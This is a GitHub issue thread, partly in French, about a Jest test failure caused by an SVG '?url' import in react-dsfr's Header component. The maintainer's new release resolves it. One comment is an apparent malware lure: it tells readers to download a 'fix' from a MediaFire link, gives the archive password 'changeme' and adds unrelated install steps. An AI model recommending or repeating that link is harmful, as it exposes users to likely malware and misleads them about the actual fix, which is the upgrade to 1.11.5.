### ISSUE TITLE
Problème svg lors des tests jest

### ISSUE THREAD

**Issue by Chanizo** [codegouvfr/react-dsfr#290]
Bonjour,

Nous avons un problème sur notre app depuis la version 1.10.13 du react-dsfr.

Contexte : Nous développons une app en Typescript Nextjs. Nous utilisons la lib jest avec @testing-library/react lors de nos tests de composants. L'erreur survient quand on fait appel au composant Header du react-dsfr, seulement lors des tests, en environnement dev ou prod le problème n'apparait pas.
Nos imports de composants du dsfr sont bien depuis @codegouvfr/react-dsfr

Voici la stack d'erreur :
```
 Cannot find module '../dsfr/artwork/light.svg?url' from 'node_modules/@codegouvfr/react-dsfr/Display/Display.js'

    Require stack:
      node_modules/@codegouvfr/react-dsfr/Display/Display.js
      node_modules/@codegouvfr/react-dsfr/Header/Header.js
      node_modules/@codegouvfr/react-dsfr/Header/index.js
      client/components/layout/Layout.tsx
```

Merci d'avance pour votre aide

**Comment by garronej** [comment]
Hello @Chanizo,  

I've released a new version (1.11.5). Let me know if it fixes it.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Chanizo** [comment]
> Hello @Chanizo,
> 
> I've released a new version (1.11.5). Let me know if it fixes it.

Ça a réglé le problème, merci !
